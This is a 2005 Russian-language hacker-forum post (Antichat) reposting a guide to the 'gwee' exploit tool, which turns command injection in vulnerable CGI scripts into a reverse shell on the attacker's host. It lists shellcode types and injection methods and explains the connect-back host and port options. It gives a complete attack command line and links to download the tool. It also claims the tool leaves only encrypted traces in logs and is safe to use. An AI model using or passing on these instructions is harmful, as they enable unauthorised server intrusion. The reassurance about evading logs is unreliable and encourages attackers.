ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Чужие Статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

..::!! Все о Gwee !!::.. (c) SVT
  #1  
Старый 19.07.2005, 19:12
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию ..::!! Все о Gwee !!::.. (c) SVT

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
..::!! Все о Gwee !!::..

\==: INTRO :================================================= ==================/

Gwee - это эксплоит который служит для получения шелл доступа к уязвимому сайту.
Допустим вы нашли бажный CGI скрипт, пользуетесь веб-шеллом, и все бы ничего.
Тока вот этого мало для вас, что тогда делать? Ответ простой, вы качаете gwee,
устанавливаете и получаете не веб-шелл, а вполне хороший шелл доступ, конечно
же права ваши будут не root (при первом посещении =), но все таки это уже
консоль и работать там куда приятнее.

Наверно самым сложным в обращении с gwee, является умение задать правильные
команды. Именно от того какие параметры вы установите и будет зависеть успех
вашей операции =)(подробнее о параметрах читай ниже). Чем еще замечателен gwee,
так это тем, что он является универсальным. Универсальность в том, что он
может получить шелл на многих машинах под разными ОС. Дело в том, что
при использовании его вы определяете какой шелл-код будет пересылаться
на уязвимую машину. В gwee доступны следующие типы шелл-кодов:
+-------------------------+
| Sabu's Perl shellcode |
| Linux x86 binary |
| FreeBSD x86 binary |
| NetBSD x86 binary |
| Sabu's Python shellcode.|
+-------------------------+
Видим, что набор хорош. Благодаря этому набору, возможно получить шелл
практически на любом серваке (главное найти уязвимый скрипт =).

Еще хотелось бы отметить, что пересылка шеллкода происходит методом GET и POST.
По умолчанию пересылка ведется методом POST, но почему-то не всегда работает.
Поэтому я советую определять опцию пересылки =).

Теперь поговорим о защите самого себя при использовании gwee. В логах сплоит
следит очень хорошо, НО он делает это «красиво», т.е. он оставляет следы в
зашифрованном виде и понять, что происходило на машине не возможно. Так
что он безопасный, использование его не должно привести к каким то плохим
последствиям

Установить gwee не просто, а очень просто. Вот последовательность команд:
+-----------------------------------+
| wget (или любая другая качалка) |
| cd |
| make unix (команда установки gwee)|
+-----------------------------------+
и все! Больше ненужно ничего лишнего. Я же говорил, что очень просто.

==: Parametrs:======================================== ==========================

Теперь поговорим о параметрах применяемые в gwee. Я не буду рассказывать обо
всех параметрах, расскажу только о самых нужных на первый раз. Поехали!

-h
Это наверно стандартный параметр в любой программе =)). Короче это помощь =)

-y
Начальный параметр, указывается перед частью ссылки до эксплуатации
gwee -y'?cmd='

-z
Часть ссылки на уязвимый скрипт и его параметры после выполнения команд
gwee -y'?cmd=' -z'|' target/cgi-bin/test.cgi

-G
Этот параметр определяет способ пересылки шелкода, о котором мы говорили выше.
Как и выше я говорю, что лучше указать этот параметр. Т.е. если вы его укажите,
то персылка ведется методом GET иначе POST.

-l
Этот параметр нужен для того что бы соединится к вашему хосту. Указывается либо
название вашего хоста с которого происходит соединение, либо ip адрес вашего
хоста.
gwee -y'?cmd=' -z'|' -l test.com target/cgi-bin/test.cgi

-p
Определяет порт содинения, по умолчанию стоит 31337

-s
0 = Sabu's Perl shellcode (default if -s is omitted)
1 = Linux x86 binary
2 = FreeBSD x86 binary
3 = NetBSD x86 binary
4 = Sabu's Python shellcode (the target must have Python installed)
Этот параметр определяет какой тип шелл-кода будет пересылаться

-i
0 = perl -e "print \"<hex>\"" (default if -i is omitted)
1 = python -c "__import__(\"sys\").stdout.write(\"<hex>\")"
2 = printf "<hex>"
3 = echo -ne "<hex>" (works only if target's /bin/sh is bash)
Каким методом будет получен шелл доступ

==: Examples :================================================= =================

Думаю на первый раз параметров хватит. Ну а теперь немного о примерах, что бы
было более понятно, что такое gwee.
+--------------------------------------------------------------------------------+
| ./gwee -y'?file=|' -z'|'-l test.com -p 31337 -s1 -i3 -G http://example/vuln.pl |
+--------------------------------------------------------------------------------+
Видим, что я определяю опцию G что бы пересылка шелл-кода шла методом GET. А так
же все стандартные опции, которое описывал выше. Этот пример давольно простой,
но он наглядно показывает как нужно правельно определять опции.
================================================== ==============================
Я описал только азы работы с gwee, но этого достаточно для успешной эксплуатации
Больше опций вы можете посмотреть в самой программе. Если будут какие вопросы по
поводу этой статьи или по поводу самого gwee, то пишите (censored@mail.ru) или
стучите в аську ( 944408 ). Постораюсь помочь.

Скачать gwee можно с нашего сайта: http://svt.nukleon.us/toos/gwee-1.36.tar.gz
И официального сайта сплоита gwee: http://tigerteam.se/dl/gwee/
================================================== ==============================
Search Vulnerabilities Team - www.svt.nukleon.us - 27.06.05 автор CENSORED
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ